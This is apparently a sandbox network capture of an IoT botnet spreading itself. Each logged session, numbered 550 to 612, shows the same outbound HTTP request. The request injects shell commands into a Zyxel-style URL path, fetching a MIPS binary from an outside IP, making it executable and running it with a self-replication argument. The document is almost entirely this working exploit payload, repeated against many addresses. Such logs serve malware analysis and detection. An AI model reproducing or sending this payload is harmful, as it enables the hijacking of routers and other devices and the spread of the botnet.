                                                Jan 12, 2024 18:16:07.094614029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                550192.168.2.2341626195.99.136.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094646931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                551192.168.2.235694019.207.22.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094693899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                552192.168.2.2354736118.218.82.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094744921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                553192.168.2.2344268192.11.162.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094769955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                554192.168.2.235388812.26.85.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094786882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                555192.168.2.2347754153.13.24.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094822884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                556192.168.2.2341846199.56.217.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094873905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                557192.168.2.2341126135.95.103.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.097558022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                558192.168.2.2357580126.232.58.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098561049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                559192.168.2.23588145.158.215.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098596096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                560192.168.2.2351456182.111.14.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098644972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                561192.168.2.2342890110.82.71.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098701000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                562192.168.2.2339836205.122.97.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098757029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                563192.168.2.2351232117.149.251.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098778009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                564192.168.2.235916624.24.209.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098850965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                565192.168.2.235694669.86.186.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098906040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                566192.168.2.2344070180.166.192.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.098958969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                567192.168.2.2352036115.192.2.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099001884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                568192.168.2.233452812.136.12.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099041939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                569192.168.2.2355712176.38.33.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099059105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                570192.168.2.234301879.0.20.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099114895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                571192.168.2.233778094.113.138.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099174023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                572192.168.2.233378694.158.33.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099203110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                573192.168.2.234742235.230.48.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099246979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                574192.168.2.236057832.183.217.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099323034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                575192.168.2.2338198209.108.235.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099442959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                576192.168.2.2334970191.50.160.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099482059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                577192.168.2.2335294174.206.23.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.099510908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                578192.168.2.235281638.245.168.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.103905916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                579192.168.2.2346216158.138.178.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.103986025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                580192.168.2.2344124173.20.67.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104111910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                581192.168.2.2341128204.81.178.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104151011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                582192.168.2.2351324173.252.211.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104237080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                583192.168.2.235053217.167.15.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104310989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                584192.168.2.2349548154.23.100.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104350090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                585192.168.2.2348798194.238.115.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104419947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                586192.168.2.2356644218.19.30.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104480982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                587192.168.2.2333374222.210.218.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104537010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                588192.168.2.2349318179.88.217.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104562998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                589192.168.2.2354684128.25.13.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104619980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                590192.168.2.2344360138.61.203.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104672909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                591192.168.2.2358798147.158.74.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104722023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                592192.168.2.235126866.185.11.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104779005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                593192.168.2.235442457.31.185.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104841948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                594192.168.2.233530675.246.66.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104895115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                595192.168.2.2334934156.142.214.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.104944944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                596192.168.2.235552042.14.242.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.105015039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                597192.168.2.2337932218.162.85.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106276035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                598192.168.2.2360460125.236.137.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106344938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                599192.168.2.235747437.213.168.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106388092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                600192.168.2.2350894174.242.254.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106447935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                601192.168.2.2342322108.201.255.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106524944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                602192.168.2.234194470.168.130.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106568098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                603192.168.2.2341560154.21.108.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106641054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                604192.168.2.234951018.125.162.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106683969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                605192.168.2.235332614.116.50.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106753111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                606192.168.2.23436701.179.129.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106823921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                607192.168.2.2353376148.170.186.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106880903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                608192.168.2.2333450131.128.236.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.106911898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                609192.168.2.235024889.226.180.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107002020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                610192.168.2.235633832.80.42.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107053041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                611192.168.2.2342580125.52.238.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107125044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                612192.168.2.2348306221.122.73.230443
                                                TimestampBytes transferredDirectionData
